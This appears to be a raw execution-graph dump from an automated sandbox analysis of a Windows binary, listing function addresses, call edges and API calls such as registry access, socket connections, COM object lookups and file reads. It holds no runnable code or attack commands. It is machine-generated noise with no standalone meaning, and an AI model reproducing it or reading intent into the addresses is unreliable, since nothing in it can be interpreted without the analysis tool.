                                                                                                                  execution_graph 104026 d81118 104601 d8e016 104026->104601 104028 d8112e 104029 d81148 104028->104029 104030 deabeb 104028->104030 104610 d83680 104029->104610 104699 d8cf79 49 API calls 104030->104699 104034 deac2a 104037 deac4a Mailbox 104034->104037 104700 dbba5d 48 API calls 104034->104700 104035 deb628 Mailbox 104707 dbd520 86 API calls 4 library calls 104037->104707 104038 d8105e 104701 d7c935 104038->104701 104039 d80119 104710 dbd520 86 API calls 4 library calls 104039->104710 104040 d9010a 48 API calls 104060 d7fad8 Mailbox _memmove 104040->104060 104043 d81063 104709 dbd520 86 API calls 4 library calls 104043->104709 104044 d80dee 104681 d7d89e 104044->104681 104046 d80dfa 104051 d7d89e 50 API calls 104046->104051 104047 deb772 104711 dbd520 86 API calls 4 library calls 104047->104711 104054 d80e83 104051->104054 104053 d7c935 48 API calls 104053->104060 104691 d7caee 104054->104691 104055 daa599 InterlockedDecrement 104055->104060 104056 d7d3d2 48 API calls 104056->104060 104057 d7fbf1 Mailbox 104059 d91b2a 52 API calls __cinit 104059->104060 104060->104038 104060->104039 104060->104040 104060->104043 104060->104044 104060->104046 104060->104047 104060->104053 104060->104054 104060->104055 104060->104056 104060->104057 104060->104059 104066 d81230 104060->104066 104070 deb583 104060->104070 104072 d810f1 Mailbox 104060->104072 104092 d7f6d0 104060->104092 104164 d7fa40 104060->104164 104221 d8f03e 104060->104221 104224 d8ef0d 104060->104224 104267 d750a3 104060->104267 104272 dd1f19 104060->104272 104275 dd17aa 104060->104275 104280 dcb74b VariantInit 104060->104280 104321 dd30ad 104060->104321 104375 d8f461 104060->104375 104413 dd10e5 104060->104413 104419 dd0bfa 104060->104419 104422 d8dd84 104060->104422 104425 dc8065 GetCursorPos GetForegroundWindow 104060->104425 104439 dc013f 104060->104439 104452 d781c6 104060->104452 104522 dc9122 104060->104522 104536 dd798d 104060->104536 104541 dc92c0 104060->104541 104559 dd804e 104060->104559 104573 dc936f 104060->104573 104680 d81620 59 API calls Mailbox 104060->104680 104695 dcee52 82 API calls 2 library calls 104060->104695 104696 dcef9d 90 API calls Mailbox 104060->104696 104697 dbb020 48 API calls 104060->104697 104698 dce713 417 API calls Mailbox 104060->104698 104062 deb7d2 104066->104057 104708 dbd520 86 API calls 4 library calls 104066->104708 104705 dbd520 86 API calls 4 library calls 104070->104705 104706 dbd520 86 API calls 4 library calls 104072->104706 104093 d7f708 104092->104093 104098 d7f77b 104092->104098 104094 d7f712 104093->104094 104095 dec4d5 104093->104095 104096 d7f71c 104094->104096 104114 dec544 104094->104114 104100 dec4f4 104095->104100 104101 dec4e2 104095->104101 104103 dec6a4 104096->104103 104113 d7f72a 104096->104113 104159 d7f741 104096->104159 104097 d7fa40 417 API calls 104147 d7f787 104097->104147 104099 dec253 104098->104099 104098->104147 104751 dbd520 86 API calls 4 library calls 104099->104751 104756 dcc235 417 API calls Mailbox 104100->104756 104712 dcf34f 104101->104712 104108 d7c935 48 API calls 104103->104108 104104 dec585 104115 dec5a4 104104->104115 104116 dec590 104104->104116 104107 dec507 104111 dec50b 104107->104111 104107->104159 104108->104159 104109 dec264 104109->104060 104757 dbd520 86 API calls 4 library calls 104111->104757 104113->104159 104787 daa599 InterlockedDecrement 104113->104787 104114->104104 104125 dec569 104114->104125 104759 dcd154 48 API calls 104115->104759 104118 dcf34f 417 API calls 104116->104118 104117 dec45a 104120 d7c935 48 API calls 104117->104120 104118->104159 104120->104159 104122 dec7b5 104124 dec7eb 104122->104124 104809 dcef9d 90 API calls Mailbox 104122->104809 104123 dec5af 104137 dec62c 104123->104137 104145 dec5d1 104123->104145 104130 d7d89e 50 API calls 104124->104130 104758 dbd520 86 API calls 4 library calls 104125->104758 104128 d7f84a 104133 dec32a 104128->104133 104142 d7f854 104128->104142 104160 d7f770 Mailbox 104130->104160 104132 dec793 104789 d784a6 104132->104789 104752 d7342c 48 API calls 104133->104752 104134 dec7c9 104140 d784a6 81 API calls 104134->104140 104784 dbafce 48 API calls 104137->104784 104139 d92241 48 API calls 104139->104147 104153 dec7d1 __NMSG_WRITE 104140->104153 104141 d7f8bb 104141->104109 104141->104117 104141->104159 104753 daa599 InterlockedDecrement 104141->104753 104755 dcf4df 417 API calls 104141->104755 104735 d814a0 104142->104735 104144 d7f8ab 104144->104141 104146 d7f9d8 104144->104146 104760 dba485 48 API calls 104145->104760 104754 dbd520 86 API calls 4 library calls 104146->104754 104147->104097 104147->104128 104147->104139 104147->104141 104147->104146 104147->104160 104149 dec79b __NMSG_WRITE 104149->104122 104151 d7d89e 50 API calls 104149->104151 104150 dec63e 104785 d8df08 48 API calls 104150->104785 104151->104122 104153->104124 104156 d7d89e 50 API calls 104153->104156 104155 dec5f6 104761 d844e0 104155->104761 104156->104124 104157 dec647 Mailbox 104786 dba485 48 API calls 104157->104786 104159->104122 104159->104160 104788 dcee52 82 API calls 2 library calls 104159->104788 104160->104060 104162 dec663 104163 d83680 417 API calls 104162->104163 104163->104159 104165 d7fa60 104164->104165 104190 d7fa8e Mailbox _memmove 104164->104190 104167 d9010a 48 API calls 104165->104167 104166 d91b2a 52 API calls __cinit 104166->104190 104167->104190 104168 d8105e 104169 d7c935 48 API calls 104168->104169 104189 d7fbf1 Mailbox 104169->104189 104170 d7d3d2 48 API calls 104170->104190 104172 d80119 105701 dbd520 86 API calls 4 library calls 104172->105701 104174 d80dee 104179 d7d89e 50 API calls 104174->104179 104175 d81063 105700 dbd520 86 API calls 4 library calls 104175->105700 104177 d80dfa 104182 d7d89e 50 API calls 104177->104182 104178 deb772 105702 dbd520 86 API calls 4 library calls 104178->105702 104179->104177 104180 d7f6d0 417 API calls 104180->104190 104184 d80e83 104182->104184 104183 d7c935 48 API calls 104183->104190 104187 d7caee 48 API calls 104184->104187 104186 deb7d2 104188 d810f1 Mailbox 104187->104188 105698 dbd520 86 API calls 4 library calls 104188->105698 104189->104060 104190->104166 104190->104168 104190->104170 104190->104172 104190->104174 104190->104175 104190->104177 104190->104178 104190->104180 104190->104183 104190->104184 104190->104188 104190->104189 104192 d81230 104190->104192 104195 d9010a 48 API calls 104190->104195 104196 d7fa40 417 API calls 104190->104196 104199 daa599 InterlockedDecrement 104190->104199 104200 deb583 104190->104200 104202 dc013f 87 API calls 104190->104202 104203 dd1f19 132 API calls 104190->104203 104204 d8f03e 2 API calls 104190->104204 104205 dd0bfa 129 API calls 104190->104205 104206 dd30ad 93 API calls 104190->104206 104207 dd798d 109 API calls 104190->104207 104208 d781c6 85 API calls 104190->104208 104209 dc936f 55 API calls 104190->104209 104210 dd804e 113 API calls 104190->104210 104211 d750a3 49 API calls 104190->104211 104212 d8ef0d 94 API calls 104190->104212 104213 dcb74b 417 API calls 104190->104213 104214 dd17aa 87 API calls 104190->104214 104215 dd10e5 82 API calls 104190->104215 104216 d8f461 98 API calls 104190->104216 104217 dc8065 55 API calls 104190->104217 104218 d8dd84 3 API calls 104190->104218 104219 dc92c0 88 API calls 104190->104219 104220 dc9122 91 API calls 104190->104220 105692 d81620 59 API calls Mailbox 104190->105692 105693 dcee52 82 API calls 2 library calls 104190->105693 105694 dcef9d 90 API calls Mailbox 104190->105694 105695 dbb020 48 API calls 104190->105695 105696 dce713 417 API calls Mailbox 104190->105696 104192->104189 105699 dbd520 86 API calls 4 library calls 104192->105699 104195->104190 104196->104190 104199->104190 105697 dbd520 86 API calls 4 library calls 104200->105697 104202->104190 104203->104190 104204->104190 104205->104190 104206->104190 104207->104190 104208->104190 104209->104190 104210->104190 104211->104190 104212->104190 104213->104190 104214->104190 104215->104190 104216->104190 104217->104190 104218->104190 104219->104190 104220->104190 104222 d8f0b5 2 API calls 104221->104222 104223 d8f046 104222->104223 104223->104060 104225 d7ca8e 48 API calls 104224->104225 104226 d8ef25 104225->104226 104227 d8effb 104226->104227 104228 d8ef3e 104226->104228 104230 d9010a 48 API calls 104227->104230 105732 d8f0f3 48 API calls 104228->105732 104231 d8f002 104230->104231 104233 d8f00e 104231->104233 105734 d75080 49 API calls 104231->105734 104232 d8ef4d 104236 d8ef73 104232->104236 104237 de6942 104232->104237 104238 d7cdb4 48 API calls 104232->104238 104235 d784a6 81 API calls 104233->104235 104239 d8f01c 104235->104239 104240 d8f03e 2 API calls 104236->104240 104237->104060 104241 de6965 104238->104241 104242 d74bf9 56 API calls 104239->104242 104251 d8ef7a 104240->104251 104241->104236 104243 de696d 104241->104243 104244 d8f02b 104242->104244 104247 d7cdb4 48 API calls 104243->104247 104244->104232 104248 de6936 104244->104248 104245 de6980 104249 d9010a 48 API calls 104245->104249 104246 d8ef87 104250 d7d3d2 48 API calls 104246->104250 104247->104251 104248->104237 105735 d74592 CloseHandle 104248->105735 104252 de6986 104249->104252 104253 d8ef8f 104250->104253 104251->104245 104251->104246 104254 de699f 104252->104254 105736 d73d65 ReadFile SetFilePointerEx 104252->105736 105703 d8f04e 104253->105703 104261 de69a3 _memmove 104254->104261 105737 dbad14 48 API calls _memset 104254->105737 104259 d8ef9e 104259->104261 105726 d77bef 104259->105726 104262 d8efb2 Mailbox 104263 d8eff2 104262->104263 104264 d750ec CloseHandle 104262->104264 104263->104060 104265 d8efe4 104264->104265 105733 d74592 CloseHandle 104265->105733 104268 d9010a 48 API calls 104267->104268 104269 d750b3 104268->104269 104270 d750ec CloseHandle 104269->104270 104271 d750be 104270->104271 104271->104060 105780 dd23c5 104272->105780 104276 d784a6 81 API calls 104275->104276 104277 dd17c7 104276->104277 104278 db6f5b 63 API calls 104277->104278 104279 dd17d8 104278->104279 104279->104060 104281 d7ca8e 48 API calls 104280->104281 104282 dcb7a3 CoInitialize 104281->104282 104283 dcb7ae CoUninitialize 104282->104283 104284 dcb7b4 104282->104284 104283->104284 104285 dcb7d5 104284->104285 104286 d7ca8e 48 API calls 104284->104286 104287 dcb81b 104285->104287 104289 d784a6 81 API calls 104285->104289 104286->104285 104288 d784a6 81 API calls 104287->104288 104290 dcb827 104288->104290 104291 dcb7ef 104289->104291 104294 dcb9d3 SetErrorMode CoGetInstanceFromFile 104290->104294 104311 dcb861 104290->104311 105864 daa857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 104291->105864 104293 dcb802 104293->104287 104295 dcb807 104293->104295 104298 dcba1f CoGetObject 104294->104298 104299 dcba19 SetErrorMode 104294->104299 105865 dcc235 417 API calls Mailbox 104295->105865 104297 dcb8a8 GetRunningObjectTable 104300 dcb8b8 104297->104300 104301 dcb8cb 104297->104301 104298->104299 104303 dcbaa8 104298->104303 104318 dcb9b1 104299->104318 104300->104301 104320 dcb8ed 104300->104320 105866 dcc235 417 API calls Mailbox 104301->105866 105870 dcc235 417 API calls Mailbox 104303->105870 104304 dcbad0 VariantClear 104304->104060 104307 dcbac2 SetErrorMode 104309 dcb814 Mailbox 104307->104309 104308 dcba53 104312 dcba6f 104308->104312 105868 daac4b 51 API calls Mailbox 104308->105868 104309->104304 104310 dcb89a 104310->104297 104311->104297 104311->104310 104313 d7cdb4 48 API calls 104311->104313 105869 dba6f6 103 API calls 104312->105869 104316 dcb88a 104313->104316 104316->104310 104317 d7cdb4 48 API calls 104316->104317 104317->104310 104318->104303 104318->104308 104320->104318 105867 daac4b 51 API calls Mailbox 104320->105867 104322 d7ca8e 48 API calls 104321->104322 104323 dd30ca 104322->104323 104324 d7d3d2 48 API calls 104323->104324 104325 dd30d3 104324->104325 104326 d7d3d2 48 API calls 104325->104326 104327 dd30dc 104326->104327 104328 d7d3d2 48 API calls 104327->104328 104329 dd30e5 104328->104329 104330 d784a6 81 API calls 104329->104330 104331 dd30f4 104330->104331 104332 dd3d7b 48 API calls 104331->104332 104333 dd3128 104332->104333 104334 dd3af7 49 API calls 104333->104334 104335 dd3159 104334->104335 104336 dd319c RegOpenKeyExW 104335->104336 104337 dd3172 RegConnectRegistryW 104335->104337 104341 dd315d Mailbox 104335->104341 104339 dd31c5 104336->104339 104340 dd31f7 104336->104340 104337->104336 104337->104341 104339->104341 104344 dd31d9 RegCloseKey 104339->104344 104342 d784a6 81 API calls 104340->104342 104341->104060 104343 dd3207 RegQueryValueExW 104342->104343 104345 dd323e 104343->104345 104373 dd3229 104343->104373 104344->104341 104346 dd344c 104345->104346 104347 dd3265 104345->104347 104345->104373 104350 d9010a 48 API calls 104346->104350 104348 dd326e 104347->104348 104349 dd33d9 104347->104349 104352 dd338d 104348->104352 104353 dd3279 104348->104353 105871 dbad14 48 API calls _memset 104349->105871 104354 dd3464 104350->104354 104351 dd34eb RegCloseKey 104351->104341 104355 dd34fe RegCloseKey 104351->104355 104360 d784a6 81 API calls 104352->104360 104358 dd32de 104353->104358 104359 dd327e 104353->104359 104361 d784a6 81 API calls 104354->104361 104355->104341 104357 dd33e4 104362 d784a6 81 API calls 104357->104362 104364 d9010a 48 API calls 104358->104364 104367 d784a6 81 API calls 104359->104367 104359->104373 104363 dd33a1 RegQueryValueExW 104360->104363 104365 dd3479 RegQueryValueExW 104361->104365 104366 dd33f6 RegQueryValueExW 104362->104366 104363->104373 104368 dd32f7 104364->104368 104365->104373 104374 dd3331 104365->104374 104366->104351 104366->104373 104369 dd329f RegQueryValueExW 104367->104369 104370 d784a6 81 API calls 104368->104370 104369->104373 104372 dd330c RegQueryValueExW 104370->104372 104371 d7ca8e 48 API calls 104371->104373 104372->104373 104372->104374 104373->104351 104374->104371 104376 d8f48a 104375->104376 104377 d8f47f 104375->104377 104380 d784a6 81 API calls 104376->104380 104402 d8f498 Mailbox 104376->104402 104378 d7cdb4 48 API calls 104377->104378 104378->104376 104379 d9010a 48 API calls 104381 d8f49f 104379->104381 104382 de6841 104380->104382 104383 d8f4af 104381->104383 105872 d75080 49 API calls 104381->105872 104385 d9297d __wsplitpath 47 API calls 104382->104385 104386 d784a6 81 API calls 104383->104386 104387 de6859 104385->104387 104388 d8f4bf 104386->104388 104389 d7caee 48 API calls 104387->104389 104390 d74bf9 56 API calls 104388->104390 104391 de686a 104389->104391 104392 d8f4ce 104390->104392 105879 d739e8 48 API calls 2 library calls 104391->105879 104394 de68d4 GetLastError 104392->104394 104403 d8f4d6 104392->104403 104396 de68ed 104394->104396 104395 de6878 104397 de6895 104395->104397 105880 db6f4b GetFileAttributesW FindFirstFileW FindClose 104395->105880 104396->104403 105881 d74592 CloseHandle 104396->105881 104398 d7cdb4 48 API calls 104397->104398 104398->104402 104399 d8f4f0 104404 d9010a 48 API calls 104399->104404 104400 de6920 104405 d9010a 48 API calls 104400->104405 104402->104379 104412 d8f50a Mailbox 104402->104412 104403->104399 104403->104400 104408 d8f4f5 104404->104408 104409 de6925 104405->104409 104406 de6888 104406->104397 104410 db6d6d 52 API calls 104406->104410 105873 d7197e 104408->105873 104410->104397 104412->104060 104414 d784a6 81 API calls 104413->104414 104415 dd10fb LoadLibraryW 104414->104415 104416 dd111e 104415->104416 104418 dd110f 104415->104418 104416->104418 105882 dd28d9 48 API calls _memmove 104416->105882 104418->104060 105883 dcf79f 104419->105883 104421 dd0c0a 104421->104060 105971 d8dd92 GetFileAttributesW 104422->105971 105976 dc6b19 104425->105976 104428 dc80a5 104429 d73320 48 API calls 104428->104429 104430 dc80b3 104429->104430 105981 d82320 50 API calls 104430->105981 104431 dc8102 104433 d7cdb4 48 API calls 104431->104433 104438 dc80f5 104431->104438 104435 dc812b 104433->104435 104434 dc80cf 105982 d82320 50 API calls 104434->105982 104437 d7cdb4 48 API calls 104435->104437 104435->104438 104437->104438 104438->104060 104440 dc015e 104439->104440 104441 dc0157 104439->104441 104442 d784a6 81 API calls 104440->104442 104443 d784a6 81 API calls 104441->104443 104442->104441 104444 dc017c 104443->104444 105983 db76db GetFileVersionInfoSizeW 104444->105983 104446 dc018d 104447 dc0192 104446->104447 104449 dc01a3 _wcscmp 104446->104449 104448 d7ca8e 48 API calls 104447->104448 104451 dc01a1 104448->104451 104450 d7ca8e 48 API calls 104449->104450 104450->104451 104451->104060 104453 d784a6 81 API calls 104452->104453 104454 d781e5 104453->104454 104455 d784a6 81 API calls 104454->104455 104456 d781fa 104455->104456 104457 d784a6 81 API calls 104456->104457 104458 d7820d 104457->104458 104459 d784a6 81 API calls 104458->104459 104460 d78223 104459->104460 104461 d77b6e 48 API calls 104460->104461 104462 d78237 104461->104462 104463 d7846a 104462->104463 104464 d7cdb4 48 API calls 104462->104464 104467 ded91e 104463->104467 104468 ded95f 104463->104468 104465 d7825e 104464->104465 104465->104463 104466 ded752 104465->104466 104493 d78281 __wopenfile 104465->104493 104471 d73320 48 API calls 104466->104471 104470 d73320 48 API calls 104467->104470 104469 d73320 48 API calls 104468->104469 104473 ded96a 104469->104473 104474 ded928 104470->104474 104472 ded769 104471->104472 104501 ded790 104472->104501 106016 d82320 50 API calls 104472->106016 106021 d82320 50 API calls 104473->106021 104476 d784a6 81 API calls 104474->104476 104480 ded93a 104476->104480 104478 d784a6 81 API calls 104481 d78306 104478->104481 104479 ded985 104487 d784a6 81 API calls 104479->104487 104483 d780ea 48 API calls 104480->104483 104484 d784a6 81 API calls 104481->104484 104482 d780ea 48 API calls 104482->104501 104485 ded94e 104483->104485 104486 d7831b 104484->104486 104491 d78182 48 API calls 104485->104491 104486->104463 104488 ded7ed 104486->104488 104495 d78342 104486->104495 104492 ded9a0 104487->104492 104488->104463 104500 d73320 48 API calls 104488->104500 104489 d78182 48 API calls 104489->104501 104490 d78364 104506 d7843f Mailbox 104490->104506 104513 ded895 104490->104513 105999 d780ea 104490->105999 106011 d9247b 59 API calls 2 library calls 104490->106011 106012 d78182 104490->106012 106015 d82320 50 API calls 104490->106015 104494 ded95c 104491->104494 104496 d780ea 48 API calls 104492->104496 104493->104463 104493->104478 104493->104488 104493->104490 106022 d82320 50 API calls 104494->106022 104498 d73320 48 API calls 104495->104498 104499 ded9b4 104496->104499 104503 d7834c 104498->104503 104504 d78182 48 API calls 104499->104504 104505 ded84a 104500->104505 104501->104482 104501->104489 104501->104506 106017 d82320 50 API calls 104501->106017 104508 d7c4cd 48 API calls 104503->104508 104504->104494 106018 d82320 50 API calls 104505->106018 104506->104060 104508->104490 104512 ded8ce 104515 d78182 48 API calls 104512->104515 104513->104512 104514 ded8bf 104513->104514 106019 d7bd2f 48 API calls _memmove 104514->106019 104517 ded8dc 104515->104517 106020 d82320 50 API calls 104517->106020 104520 ded8ee 104521 d7c4cd 48 API calls 104520->104521 104521->104463 104523 d784a6 81 API calls 104522->104523 104524 dc913f 104523->104524 104525 d7cdb4 48 API calls 104524->104525 104526 dc9149 104525->104526 106024 dcacd3 104526->106024 104528 dc9156 104529 dc915a socket 104528->104529 104534 dc9182 104528->104534 104530 dc916d WSAGetLastError 104529->104530 104531 dc9184 connect 104529->104531 104530->104534 104532 dc91a3 WSAGetLastError 104531->104532 104531->104534 106030 dbd7e4 104532->106030 104534->104060 104535 dc91b8 closesocket 104535->104534 106045 d719ee 104536->106045 104540 dd79a4 104540->104060 104542 d7a6d4 48 API calls 104541->104542 104543 dc92d2 104542->104543 104544 d784a6 81 API calls 104543->104544 104545 dc92e1 104544->104545 104546 d8f26b 50 API calls 104545->104546 104547 dc92ed gethostbyname 104546->104547 104548 dc931d _memmove 104547->104548 104549 dc92fa WSAGetLastError 104547->104549 104551 dc932d inet_ntoa 104548->104551 104550 dc930e 104549->104550 104553 d7ca8e 48 API calls 104550->104553 106163 dcadca 48 API calls 2 library calls 104551->106163 104558 dc931b Mailbox 104553->104558 104554 dc9342 106164 dcae5a 50 API calls 104554->106164 104556 dc934e 104557 d77bef 48 API calls 104556->104557 104557->104558 104558->104060 104560 d719ee 83 API calls 104559->104560 104561 dd8062 104560->104561 104562 d71dce 107 API calls 104561->104562 104563 dd806b 104562->104563 104564 dd806f 104563->104564 104565 dd8091 104563->104565 104567 d7ca8e 48 API calls 104564->104567 104566 d7d3d2 48 API calls 104565->104566 104568 dd809a 104566->104568 104571 dd808f Mailbox 104567->104571 106165 dae2e8 104568->106165 104570 dd80aa 104572 d77bef 48 API calls 104570->104572 104571->104060 104572->104571 104574 d7cdb4 48 API calls 104573->104574 104575 dc938a 104574->104575 104576 d7cdb4 48 API calls 104575->104576 104577 dc939a 104576->104577 104578 d7ca8e 48 API calls 104577->104578 104579 dc93a9 104578->104579 104580 dc93c2 select 104579->104580 104596 dc93ae Mailbox _memmove 104579->104596 104581 dc941f 104580->104581 104582 dc9414 WSAGetLastError 104580->104582 104583 d9010a 48 API calls 104581->104583 104582->104596 104584 dc9428 104583->104584 104585 d74bce 48 API calls 104584->104585 104586 dc9432 __WSAFDIsSet 104585->104586 104587 dc944a 104586->104587 104586->104596 104588 dc94f5 WSAGetLastError 104587->104588 104589 dc9463 104587->104589 104588->104596 104590 dc947b _strlen 104589->104590 104591 d7cdb4 48 API calls 104589->104591 104589->104596 104592 dc94be 104590->104592 104593 dc948e 104590->104593 104591->104590 106192 dbad14 48 API calls _memset 104592->106192 106190 dae0f5 48 API calls 2 library calls 104593->106190 104596->104060 104597 dc9497 106191 dcae5a 50 API calls 104597->106191 104599 dc94a3 104600 d77bef 48 API calls 104599->104600 104600->104596 104602 d8e022 104601->104602 104603 d8e034 104601->104603 104604 d7d89e 50 API calls 104602->104604 104605 d8e03a 104603->104605 104606 d8e063 104603->104606 104609 d8e02c 104604->104609 104607 d9010a 48 API calls 104605->104607 104608 d7d89e 50 API calls 104606->104608 104607->104609 104608->104609 104609->104028 106193 d7a9a0 104610->106193 104612 d836e7 104613 d83778 104612->104613 104614 dea269 104612->104614 104672 d83aa8 104612->104672 106205 d8bc04 86 API calls 104613->106205 106210 dbd520 86 API calls 4 library calls 104614->106210 104618 dea68d 104618->104672 106231 dbd520 86 API calls 4 library calls 104618->106231 104620 d8bc5c 48 API calls 104670 d8396b Mailbox _memmove 104620->104670 104621 d83793 104621->104618 104621->104670 104621->104672 106198 d710e8 104621->106198 104625 dea289 104668 dea3e9 104625->104668 106211 d7d2d2 104625->106211 104626 dea583 104628 d7fa40 417 API calls 104626->104628 104627 dea45c 106225 dbd520 86 API calls 4 library calls 104627->106225 104632 dea5b5 104628->104632 104631 d8384e 104642 dea60c 104631->104642 104643 d838e5 104631->104643 104631->104670 104639 d7d380 55 API calls 104632->104639 104632->104672 104635 dea40f 106222 d8cf79 49 API calls 104635->106222 104636 dea303 104649 dea317 104636->104649 104656 dea341 104636->104656 104645 dea5e6 104639->104645 106230 dbd231 50 API calls 104642->106230 104644 d9010a 48 API calls 104643->104644 104659 d838ec 104644->104659 106229 dbd520 86 API calls 4 library calls 104645->106229 104646 d7fa40 417 API calls 104646->104670 104648 dea42c 104650 dea44d 104648->104650 104651 dea441 104648->104651 106217 dbd520 86 API calls 4 library calls 104649->106217 106224 dbd520 86 API calls 4 library calls 104650->106224 106223 dbd520 86 API calls 4 library calls 104651->106223 104657 dea366 104656->104657 104662 dea384 104656->104662 106218 dcf211 417 API calls 104657->106218 104658 d7d89e 50 API calls 104658->104670 104664 d7e1f0 417 API calls 104659->104664 104667 d8399f 104659->104667 104661 dea37a 104661->104672 106220 d8baef 48 API calls _memmove 104661->106220 104662->104661 106219 dcf4df 417 API calls 104662->106219 104664->104670 104665 d9010a 48 API calls 104665->104670 104669 d7c935 48 API calls 104667->104669 104671 d839c0 104667->104671 106221 dbd520 86 API calls 4 library calls 104668->106221 104669->104671 104670->104620 104670->104625 104670->104626 104670->104627 104670->104645 104670->104646 104670->104658 104670->104665 104670->104667 104670->104672 106206 d7d500 53 API calls __cinit 104670->106206 106207 d7d420 53 API calls 104670->106207 106208 d8baef 48 API calls _memmove 104670->106208 106226 dcd21a 82 API calls Mailbox 104670->106226 106227 db89e0 53 API calls 104670->106227 106228 d7d772 55 API calls 104670->106228 104671->104672 104674 dea65e 104671->104674 104676 d83a05 104671->104676 104679 d83ab5 Mailbox 104672->104679 106209 dbd520 86 API calls 4 library calls 104672->106209 104675 d7d89e 50 API calls 104674->104675 104675->104618 104676->104618 104676->104672 104677 d83a95 104676->104677 104678 d7d89e 50 API calls 104677->104678 104678->104672 104679->104060 104680->104060 104682 d7d8ac 104681->104682 104689 d7d8db Mailbox 104681->104689 104683 d7d8ff 104682->104683 104685 d7d8b2 Mailbox 104682->104685 104684 d7c935 48 API calls 104683->104684 104684->104689 104686 d7d8c7 104685->104686 104687 de4e9b 104685->104687 104688 de4e72 VariantClear 104686->104688 104686->104689 104687->104689 106235 daa599 InterlockedDecrement 104687->106235 104688->104689 104689->104046 104692 d7cafd __NMSG_WRITE _memmove 104691->104692 104693 d9010a 48 API calls 104692->104693 104694 d7cb3b 104693->104694 104694->104072 104695->104060 104696->104060 104697->104060 104698->104060 104699->104034 104700->104037 104702 d7c940 104701->104702 104703 d7c948 104701->104703 104704 d7d805 48 API calls 104702->104704 104703->104057 104704->104703 104705->104072 104706->104057 104707->104035 104708->104043 104709->104039 104710->104047 104711->104062 104810 d7d3d2 104712->104810 104714 dcf389 Mailbox 104716 dcf3cd 104714->104716 104717 dcf3e1 104714->104717 104732 dcf3a9 104714->104732 104715 d7d89e 50 API calls 104730 dcf421 Mailbox 104715->104730 104821 d77e53 104716->104821 104719 d7c935 48 API calls 104717->104719 104720 dcf3df 104719->104720 104721 dcf429 104720->104721 104830 dccdb5 417 API calls 104720->104830 104815 dccd12 104721->104815 104724 dcf410 104724->104721 104726 dcf414 104724->104726 104725 dcf44b 104728 dcf457 104725->104728 104729 dcf4a2 104725->104729 104831 dbd338 86 API calls 4 library calls 104726->104831 104728->104732 104733 dcf476 104728->104733 104731 dcf34f 417 API calls 104729->104731 104730->104159 104731->104730 104732->104715 104832 d7ca8e 104733->104832 104736 d814b2 104735->104736 104737 d81606 104735->104737 104739 d9010a 48 API calls 104736->104739 104749 d814be 104736->104749 104737->104144 104740 de5299 104739->104740 104741 d9010a 48 API calls 104740->104741 104750 de52a4 104741->104750 104742 d814c9 104743 d8156d 104742->104743 104744 d9010a 48 API calls 104742->104744 104743->104144 104745 d815af 104744->104745 104746 d815c2 104745->104746 104957 d8d6b4 48 API calls 104745->104957 104746->104144 104748 d9010a 48 API calls 104748->104750 104749->104742 104958 d7346e 48 API calls 104749->104958 104750->104748 104750->104749 104751->104109 104752->104141 104753->104141 104754->104160 104755->104141 104756->104107 104757->104160 104758->104160 104759->104123 104760->104155 104762 d8469f 104761->104762 104763 d84537 104761->104763 104766 d7caee 48 API calls 104762->104766 104764 d84543 104763->104764 104765 de7820 104763->104765 104959 d84040 104764->104959 105131 dce713 417 API calls Mailbox 104765->105131 104773 d845e4 Mailbox 104766->104773 104769 d84639 Mailbox 104769->104159 104770 de782c 104770->104769 105132 dbd520 86 API calls 4 library calls 104770->105132 104772 d84559 104772->104769 104772->104770 104772->104773 104776 dd1f19 132 API calls 104773->104776 104974 dbdce9 104773->104974 104979 dc1080 104773->104979 104982 d8f55e 104773->104982 104991 dc6fc3 104773->104991 104994 d750ec 104773->104994 104998 dc9500 104773->104998 105007 dbefcd 104773->105007 105041 dd352a 104773->105041 105129 dc95af WSAStartup 104773->105129 104776->104769 104784->104150 104785->104157 104786->104162 104787->104159 104788->104132 104790 d784be 104789->104790 104807 d784ba 104789->104807 104791 de5592 __i64tow 104790->104791 104792 d784d2 104790->104792 104793 de5494 104790->104793 104802 d784ea __itow Mailbox _wcscpy 104790->104802 105690 d9234b 80 API calls 2 library calls 104792->105690 104795 de557a 104793->104795 104796 de549d 104793->104796 105691 d9234b 80 API calls 2 library calls 104795->105691 104800 de54bc 104796->104800 104796->104802 104797 d9010a 48 API calls 104799 d784f4 104797->104799 104803 d7caee 48 API calls 104799->104803 104799->104807 104801 d9010a 48 API calls 104800->104801 104804 de54d9 104801->104804 104802->104797 104803->104807 104805 d9010a 48 API calls 104804->104805 104806 de54ff 104805->104806 104806->104807 104808 d7caee 48 API calls 104806->104808 104807->104149 104808->104807 104809->104134 104846 d9010a 104810->104846 104812 d7d3f3 104813 d9010a 48 API calls 104812->104813 104814 d7d401 104813->104814 104814->104714 104816 dccd21 104815->104816 104820 dccd46 104815->104820 104817 d7ca8e 48 API calls 104816->104817 104818 dccd2d 104817->104818 104877 dcc8b7 104818->104877 104820->104725 104822 d77ecf 104821->104822 104825 d77e5f __NMSG_WRITE 104821->104825 104945 d7a2fb 104822->104945 104824 d77e85 _memmove 104824->104720 104826 d77ec7 104825->104826 104827 d77e7b 104825->104827 104944 d77eda 48 API calls 104826->104944 104941 d7a6f8 104827->104941 104830->104724 104831->104730 104833 d7cad0 104832->104833 104834 d7ca9a 104832->104834 104835 d7cae3 104833->104835 104836 d7cad9 104833->104836 104839 d9010a 48 API calls 104834->104839 104953 d7c4cd 104835->104953 104837 d77e53 48 API calls 104836->104837 104843 d7cac6 104837->104843 104840 d7caad 104839->104840 104841 de4f11 104840->104841 104842 d7cab8 104840->104842 104841->104843 104844 d7d3d2 48 API calls 104841->104844 104842->104843 104845 d7caee 48 API calls 104842->104845 104843->104730 104844->104843 104845->104843 104849 d90112 __calloc_impl 104846->104849 104848 d9012c 104848->104812 104849->104848 104850 d9012e std::exception::exception 104849->104850 104855 d945ec 104849->104855 104869 d97495 RaiseException 104850->104869 104852 d90158 104870 d973cb 47 API calls _free 104852->104870 104854 d9016a 104854->104812 104856 d94667 __calloc_impl 104855->104856 104864 d945f8 __calloc_impl 104855->104864 104876 d9889e 47 API calls __getptd_noexit 104856->104876 104857 d94603 104857->104864 104871 d98e52 47 API calls 2 library calls 104857->104871 104872 d98eb2 47 API calls 6 library calls 104857->104872 104873 d91d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104857->104873 104860 d9462b RtlAllocateHeap 104861 d9465f 104860->104861 104860->104864 104861->104849 104863 d94653 104874 d9889e 47 API calls __getptd_noexit 104863->104874 104864->104857 104864->104860 104864->104863 104867 d94651 104864->104867 104875 d9889e 47 API calls __getptd_noexit 